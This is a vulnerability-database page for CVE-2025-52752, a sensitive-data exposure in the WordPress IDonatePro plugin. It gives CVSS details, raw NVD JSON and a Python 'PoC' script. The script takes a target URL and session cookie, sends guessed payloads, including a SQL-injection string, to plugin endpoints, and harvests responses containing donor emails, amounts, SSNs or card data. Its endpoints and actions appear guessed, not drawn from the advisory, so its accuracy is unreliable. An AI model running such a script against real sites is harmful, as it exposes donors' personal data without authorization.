Security Vulnerability Report
中文
CVE-2025-52752 CVSS 6.5 MEDIUM

CVE-2025-52752

Published: 2025-10-22 15:15:45
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThemeAtelier IDonatePro idonate-pro allows Retrieve Embedded Sensitive Data.This issue affects IDonatePro: from n/a through <= 2.1.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

IDonatePro <= 2.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52752 PoC - IDonatePro Sensitive Information Exposure # Author: Security Researcher # Target: WordPress IDonatePro Plugin <= 2.1.9 import requests import sys from urllib.parse import urljoin def exploit_cve_2025_52752(target_url, auth_cookie): """ Exploit for CVE-2025-52752: IDonatePro Sensitive Information Exposure This PoC demonstrates how an authenticated low-privilege user can retrieve sensitive embedded data through the vulnerable plugin endpoint. Prerequisites: - Valid WordPress account with subscriber+ privileges - WordPress session cookie """ # Target vulnerable endpoint endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/idonate/v1/donors', '/wp-content/plugins/idonate-pro/includes/api/donor-data.php' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Cookie': auth_cookie, 'X-Requested-With': 'XMLHttpRequest' } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-52752...") for endpoint in endpoints: full_url = urljoin(target_url, endpoint) # Common attack vectors payloads = [ {'action': 'idonate_get_donors', 'nonce': ''}, {'action': 'idonate_export_data', 'format': 'json'}, {'donor_id': '1 OR 1=1', 'limit': '1000'} ] for payload in payloads: try: response = requests.post(full_url, data=payload, headers=headers, timeout=10) if response.status_code == 200: # Check for sensitive data indicators if any(indicator in response.text.lower() for indicator in ['email', 'name', 'amount', 'donation', 'ssn', 'credit']): print(f"[+] Potential sensitive data found at: {endpoint}") print(f"[+] Response snippet: {response.text[:500]}...") return response.text except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] Manual verification required via browser with admin cookie") return None if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-52752.py <target_url> <auth_cookie>") print("Example: python cve-2025-52752.py http://example.com 'wordpress_abc123'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_cve_2025_52752(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52752", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:45.070", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThemeAtelier IDonatePro idonate-pro allows Retrieve Embedded Sensitive Data.This issue affects IDonatePro: from n/a through <= 2.1.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/idonate-pro/vulnerability/wordpress-idonatepro-plugin-2-1-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}